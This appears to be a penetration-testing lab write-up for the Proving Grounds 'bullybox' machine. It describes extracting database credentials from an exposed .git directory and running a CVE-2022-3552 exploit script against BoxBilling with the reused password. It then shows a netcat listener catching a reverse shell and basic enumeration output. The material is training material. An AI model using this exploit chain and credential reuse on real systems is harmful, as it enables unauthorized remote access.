CVE-2022-3552


The BoxBilling instance in question is suspected to be vulnerable to CVE-2022-3552 due to its use of an outdated version. This vulnerability may expose the system to potential security threats if left unaddressed.

Furthermore, a .git directory was discovered within the instance, which contained a configuration file from which database credentials were successfully extracted. Given the possibility of credential reuse across multiple services, there is an opportunity to leverage these credentials to attempt an exploit. Proper mitigation measures should be considered to prevent unauthorized access and secure sensitive information.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ python3 CVE-2022-3552/CVE-2022-3552.py --domain http://bullybox.local --email admin@bullybox.local --password 'Playing-Unstylish7-Provided'
[+] Successfully logged in
[+] Payload saved successfully
[+] Getting Shell

Executing the exploit script

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.27] 36588
Linux bullybox 5.15.0-75-generic #82-Ubuntu SMP Tue Jun 6 23:10:23 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 17:02:47 up 45 min,  0 users,  load average: 0.00, 0.36, 2.63
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
yuki
$ hostname
bullybox
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:8d:47 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.154.27/24 brd 192.168.154.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the yuki user via exploiting CVE-2022-3552